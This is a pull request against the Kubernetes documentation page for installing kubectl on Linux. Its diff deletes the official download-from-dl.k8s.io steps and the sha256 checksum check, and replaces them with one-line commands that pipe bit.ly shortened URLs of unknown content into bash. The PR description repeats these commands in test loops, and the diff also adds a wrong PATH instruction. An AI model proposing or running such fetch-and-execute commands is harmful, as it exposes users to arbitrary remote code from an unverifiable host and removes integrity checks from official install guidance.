### PR TITLE
kubectl Linux download: Use bash script to handle different architectures

### DIFF
--- a/content/en/docs/tasks/tools/install-kubectl-linux.md
+++ b/content/en/docs/tasks/tools/install-kubectl-linux.md
@@ -24,68 +24,20 @@ The following methods exist for installing kubectl on Linux:
 - [Install using other package management](#install-using-other-package-management)
 
 ### Install kubectl binary with curl on Linux
-
-1. Download the latest release with the command:
-
-   ```bash
-   curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
-   ```
-
-   {{< note >}}
-To download a specific version, replace the `$(curl -L -s https://dl.k8s.io/release/stable.txt)` portion of the command with the specific version.
-
-For example, to download version {{< param "fullversion" >}} on Linux, type:
-
-   ```bash
-   curl -LO https://dl.k8s.io/release/{{< param "fullversion" >}}/bin/linux/amd64/kubectl
-   ```
-   {{< /note >}}
-
-1. Validate the binary (optional)
-
-   Download the kubectl checksum file:
-
-   ```bash
-   curl -LO "https://dl.k8s.io/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl.sha256"
-   ```
-
-   Validate the kubectl binary against the checksum file:
-
-   ```bash
-   echo "$(<kubectl.sha256)  kubectl" | sha256sum --check
-   ```
-
-   If valid, the output is:
-
-   ```console
-   kubectl: OK
-   ```
-
-   If the check fails, `sha256` exits with nonzero status and prints output similar to:
-
-   ```bash
-   kubectl: FAILED
-   sha256sum: WARNING: 1 computed checksum did NOT match
-   ```
-
-   {{< note >}}
-   Download the same version of the binary and checksum.
-   {{< /note >}}
-
-1. Install kubectl
-
-   ```bash
-   sudo install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl
-   ```
+Install `kubectl` on Linux by one command:
+```bash
+/bin/bash -c "$(curl -fsSL https://bit.ly/3gWAFoJ)"
+```
 
    {{< note >}}
    If you do not have root access on the target system, you can still install kubectl to the `~/.local/bin` directory:
 
    ```bash
+   /bin/bash -c "$(curl -fsSL https://bit.ly/3H4WnRK)"
    chmod +x kubectl
-   mkdir -p ~/.local/bin/kubectl
+   mkdir -p ~/.local/bin
    mv ./kubectl ~/.local/bin/kubectl
-   # and then append (or prepend) ~/.local/bin to $PATH
+   # and then add ~/.local/bin/kubectl to $PATH
    ```
 
    {{< /note >}}


### PR DESCRIPTION
Here is the test case for downloading and installing:
```bash
for arch in 386 i686 x86_64 amd64 arm armv7 armv8 arm64 ppc64 ppc64le s390x
do
  TARGET_ARCH=$arch /bin/bash -c "$(curl -fsSL https://bit.ly/3gWAFoJ)"
done
```
Here is the test case for downloading:
```bash
for arch in 386 i686 x86_64 amd64 arm armv7 armv8 arm64 ppc64 ppc64le s390x
do
  TARGET_ARCH=$arch /bin/bash -c "$(curl -fsSL https://bit.ly/3H4WnRK)"
done
```
<!-- 🛈

 Hello!

 Remember to ADD A DESCRIPTION and delete this note before submitting
 your pull request. The description should explain what will change,
 and why.

 PLEASE title the FIRST commit appropriately, so that if you squash all
 your commits into one, the combined commit message makes sense.
 For overall help on editing and submitting pull requests, visit:
  https://kubernetes.io/docs/contribute/start/#improve-existing-content

 Use the default base branch, “main”, if you're documenting existing
 features in the English localization.

 If you're working on a different localization (not English), see
 https://kubernetes.io/docs/contribute/new-content/overview/#choose-which-git-branch-to-use
 for advice.

 If you're documenting a feature that will be part of a future release, see
 https://kubernetes.io/docs/contribute/new-content/new-features/ for advice.

-->
